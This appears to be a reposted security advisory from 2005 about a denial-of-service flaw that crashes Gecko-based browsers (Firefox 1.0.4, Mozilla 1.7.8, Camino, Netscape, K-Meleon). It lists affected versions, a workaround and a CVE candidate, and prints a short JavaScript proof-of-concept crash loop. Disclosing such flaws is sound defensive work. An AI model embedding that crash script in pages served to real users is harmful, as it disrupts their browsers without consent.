‘Gecko Browsers DoS’

Summary

A denial of service vulnerability with Gekco based browsers (Netscape, K-Meleon, Mozilla suite, Firefox and Camino) allows attackers to crash the browser by crafting a special Javascript code.’

Credit:

‘The information has been provided by Kurczaba Associates and Juha-Matti Laurio.
The original article can be found at: http://www.kurczaba.com/html/security/0506241.htm


Details

Vulnerable Systems:
 * Mozilla Suite version 1.7.8
 * Firefox version 1.0.4
 * Camino version 0.8.4
 * Netscape Browser versions 8.x
 * K-Meleon Browser versions 0.x

By using a specially crafted JavaScript function, it is possible to crash the above named browsers. The script can be executed both with and without user intervention.
Proof of Concept:
for (a = 0; a <= 20000; a++)
{
  //Here is the special code that terminates the browser
   function(){};
}
//Displays an alert to notify the user if the browser is not vulnerable.
alert(‘Good news – Your browser is not vulnerable.’);

Workaround:
Disable Javascript for untrusted web sites.

CVE Information:
CAN-2005-2114

Categories: News